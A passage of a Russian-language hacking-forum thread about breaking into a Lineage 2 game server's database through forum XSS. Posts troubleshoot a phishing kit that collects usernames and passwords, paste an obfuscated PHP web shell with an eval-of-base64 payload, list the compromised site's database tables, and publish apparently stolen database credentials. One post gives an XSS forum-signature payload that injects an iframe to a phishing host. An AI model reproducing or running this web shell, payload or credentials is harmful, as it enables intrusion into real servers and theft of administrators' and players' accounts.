Регистрация Главная Пользователи Все разделы прочитаны
Сообщения за день Справка Регистрация

Взлом БД через форум с xss

-

Базы серверов и брут

- Все, что связано с брутом и работой с базами данных

Закрытая тема
 
Опции темы
Старый 10.06.2010, 07:35   #76
Заблокирован
 Рыцарь
Аватар для m0nk
 
m0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компании
Регистрация: 10.12.2009
Сообщений: 330
Популярность: 1099
Сказал(а) спасибо: 148
Поблагодарили 375 раз(а) в 108 сообщениях
Отправить сообщение для m0nk с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от Me$$iahПосмотреть сообщение
Это я понимаю. Я наверно не правильно выразился. Я имел ввиду то, что у меня ни в одном браузере не работает скрипт с автопереадресацией с куками (Когда переадресация идёт без участия мышки).


Это нормальное явление, значит у тебя новый браузер, а скрипт с автоматической переадресацие не пашет на новых, но не факт что он не будет работать у админа.
 
Старый 10.06.2010, 13:38   #77
 Разведчик
Аватар для p.Number0ne
 
p.Number0ne никому не известный тип
Регистрация: 22.05.2010
Сообщений: 2
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

Дорогой "Монк" у меня вопрос !!!
Итак в проге всё прописываю получаю Index.html и ещё 2 файла login.php 1.txt после этого заливаю на сайт а в сайте какие-та не понятные ироглифы на компе открывается норм index.html а на моём сайте это фигня !!!Пожалуйста объясни мне как убрать ошибку ...
________________
Помог ?Жми спосибку ) !
{ADM}{Number0ne}
 
Старый 10.06.2010, 13:55   #78
Заблокирован
 Рыцарь
Аватар для m0nk
 
m0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компании
Регистрация: 10.12.2009
Сообщений: 330
Популярность: 1099
Сказал(а) спасибо: 148
Поблагодарили 375 раз(а) в 108 сообщениях
Отправить сообщение для m0nk с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Открываешь index.htm блокнотом, выбираешь файл --> сохранить как , выбираешь кодировку (ANSI, UTF-8, Юникод, пробуй разные я точно не помню) где имя файла пишешь index.htm и сохраняешь
 
Старый 10.06.2010, 15:00   #79
 Разведчик
Аватар для MrXF
 
MrXF никому не известный тип
Регистрация: 10.05.2010
Сообщений: 1
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Отправить сообщение для MrXF с помощью ICQ Отправить сообщение для MrXF с помощью Skype™
 
По умолчанию Re: Взлом БД через форум с xss

5) Нажимаем создать, выбираем 2 поля UserName и PassWord, нажимаем продолжить, закрываем, видим 3 файла в корне программы ( login.php, index.htm, pass.txt) все их нужно залить на фтп. (Для этого вам нужен хостинг. список хостингов можно посмотреть здесь

всё зделал тыкаю сылку "здесь" вылазит , IP менял

Вы были заблокированы по следующей причине:
Причина не указана.

Дата снятия блокировки: Никогда

Последний раз редактировалось MrXF; 10.06.2010 в 16:00.
 
Старый 10.06.2010, 18:58   #80
Заблокирован
 Капитан
Аватар для BlackWinG
 
BlackWinG излучает ауруBlackWinG излучает ауруBlackWinG излучает ауруBlackWinG излучает ауруBlackWinG излучает ауруBlackWinG излучает ауру
Регистрация: 08.04.2010
Сообщений: 279
Популярность: 654
Сказал(а) спасибо: 126
Поблагодарили 277 раз(а) в 113 сообщениях
Отправить сообщение для BlackWinG с помощью ICQ Отправить сообщение для BlackWinG с помощью Skype™
 
По умолчанию Re: Взлом БД через форум с xss

Бери другой хостинг просто h1.ru
 
Старый 11.06.2010, 16:21   #81
 Разведчик
Аватар для Me$$iah
 
Me$$iah никому не известный тип
Регистрация: 09.06.2010
Сообщений: 7
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

Загрузил шелл захожу по нему: Ответ:
Код:
<?php # Web Shell by oRb
$auth_pass = "63a9f0ea7bb98050796b649e85481845";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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

(Я всё копипаст не стал, там такая ****ь "9JEsQGoV9G7dx" еще 2 - 3 Строчки. Почему не могу зайти в предведущю директорию?
Решил переделать. Добавил Новый формат: .phtml
Захожу на av-69.phtml - ввожу root
Зашёл в /home/l/.../public_html/inc/data/
Но тама есть только
Цитата:
dle_admin_sections
dle_banned
dle_banners
dle_category
dle_comments
dle_email
dle_files
dle_flood
dle_images
dle_logs
dle_lostdb
dle_notice
dle_pm
dle_poll
dle_poll_log
dle_post
dle_post_log
dle_rss
dle_rssinform
dle_static
dle_static_files
dle_subscribe
dle_tags
dle_usergroups
dle_users
dle_views
dle_vote
dle_vote_result
stress_admin
stress_news
stress_poll
stress_poll_logs
stress_static
stress_users_tmp

.

accounts - нету((

Последний раз редактировалось Me$$iah; 11.06.2010 в 19:51.
 
Старый 11.06.2010, 20:38   #82
༼ ᕤ◕◡◕ ༽ᕤ
 Капитан
Аватар для Chipito
 
Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(
Регистрация: 09.12.2009
Сообщений: 256
Популярность: 20088
Золото Zhyk.Ru: 1
Сказал(а) спасибо: 181
Поблагодарили 681 раз(а) в 251 сообщениях
Отправить сообщение для Chipito с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от Me$$iahПосмотреть сообщение
Загрузил шелл захожу по нему: Ответ:
Код:
<?php # Web Shell by oRb
$auth_pass = "63a9f0ea7bb98050796b649e85481845";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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

(Я всё копипаст не стал, там такая ****ь "9JEsQGoV9G7dx" еще 2 - 3 Строчки. Почему не могу зайти в предведущю директорию?
Решил переделать. Добавил Новый формат: .phtml
Захожу на av-69.phtml - ввожу root
Зашёл в /home/l/.../public_html/inc/data/
Но тама есть только.

accounts - нету((

Зашел не в ту базу,конфиги смотри в config_game_l2db.php
(названия точно не помню)
________________
 
Старый 12.06.2010, 00:28   #83
 Разведчик
Аватар для Me$$iah
 
Me$$iah никому не известный тип
Регистрация: 09.06.2010
Сообщений: 7
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

В config_l2db_game.php есть упоминане про какую-то l2open_db.
Но в разделе SQL есть только две базы:
1) La2**** Tables:
2) information_schema Tables:
Это говорит о том, что сама гейм база находиться на компе у админа? Если да, то каим образом получить её?

Последний раз редактировалось Me$$iah; 12.06.2010 в 01:10.
 
Старый 12.06.2010, 00:33   #84
 Пехотинец
Аватар для Helko
 
Helko на правильном путиHelko на правильном пути
Регистрация: 19.03.2010
Сообщений: 76
Популярность: 156
Сказал(а) спасибо: 18
Поблагодарили 135 раз(а) в 53 сообщениях
Отправить сообщение для Helko с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

$l2db["gameserver"]["1"]["db"]["host"] = "77.246.106.***";
$l2db["gameserver"]["1"]["db"]["user"] = "site";
$l2db["gameserver"]["1"]["db"]["pass"] = "vq121294";
$l2db["gameserver"]["1"]["db"]["dbname"] = "l2open_db";

нажимаешь в шеле sql и вводишь эти данные
________________
698-1-896
При себе иметь 10+ сообщений. пишем сразу по делу
Раздаю свой парсер для slil.ru тут

Последний раз редактировалось Helko; 12.06.2010 в 14:15.
 
Старый 12.06.2010, 14:11   #85
 Разведчик
Аватар для saxivan
 
saxivan никому не известный тип
Регистрация: 10.06.2010
Сообщений: 1
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

В подпись вставил------> [acronym=[acronym= style=background:url('//') onerror= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime( )+30*24*60*60*1000);document.cookie=\x22ipb_my=123 4;\x20expires=\x22+valid_until.toGMTString();docum ent.write(\x22\x3C******\x20src=httr://forum.thmega.freehostia.com\x20frameborder=0\x20wi dth=100%\x20height=100%\x20scrolling=no\x3E\x3C/******\x3E\x22);document.close()}";eval(lol); ]][/acronym][/acronym]

и прказывает----> '> и на фейк не кидает.Что не так?
________________
12345
 
Старый 12.06.2010, 15:11   #86
Заблокирован
 Рыцарь
Аватар для m0nk
 
m0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компании
Регистрация: 10.12.2009
Сообщений: 330
Популярность: 1099
Сказал(а) спасибо: 148
Поблагодарили 375 раз(а) в 108 сообщениях
Отправить сообщение для m0nk с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

1) либо куки чисть
2) либо забей и отправляй админу
3) либо если хочешь проверить качай браузер opera 9 и т.п.
 
Старый 13.06.2010, 14:30   #87
 Разведчик
Аватар для Rjay
 
Rjay никому не известный тип
Регистрация: 08.06.2010
Сообщений: 3
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Отправить сообщение для Rjay с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

не пойму.надо заливать 3 файла на хостинг или 1 или архивом?и куда ссылку на них кидать?
 
Старый 13.06.2010, 14:37   #88
Заблокирован
 Разведчик
Аватар для zDebeF
 
zDebeF на правильном пути
Регистрация: 31.05.2010
Сообщений: 5
Популярность: 34
Сказал(а) спасибо: 0
Поблагодарили 12 раз(а) в 5 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

если даже не знаешь как и куда заливать - забудь лучше вообще.

Заливать 3 файла, переход на главную страницу [xxx.ru/ ; xxx.ru/index.php]
 
Старый 13.06.2010, 14:39   #89
 Разведчик
Аватар для Rjay
 
Rjay никому не известный тип
Регистрация: 08.06.2010
Сообщений: 3
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Отправить сообщение для Rjay с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

все равно не понял.если можно поподробней.вот есть 3 файла.залил по 1ому на хостинг,дальше что делать?
 
Старый 13.06.2010, 14:54   #90
Читер-спонсор
 Старший сержант
Аватар для Fix
 
Fix душа компанииFix душа компанииFix душа компанииFix душа компанииFix душа компанииFix душа компанииFix душа компанииFix душа компании
Регистрация: 15.08.2009
Сообщений: 218
Популярность: 1020
Сказал(а) спасибо: 196
Поблагодарили 140 раз(а) в 84 сообщениях
Отправить сообщение для Fix с помощью ICQ Отправить сообщение для Fix с помощью Skype™
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от RjayПосмотреть сообщение
все равно не понял.если можно поподробней.вот есть 3 файла.залил по 1ому на хостинг,дальше что делать?

Читать первый пост.
________________
 
Закрытая тема

Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом сервера через PHP Silence Треп 1 27.09.2010 21:41
Кража аккаунтов через форум (скрипт php) Razzor Подполье Lineage 2 (0 уровень) 1 01.08.2009 01:21

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 17:32.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net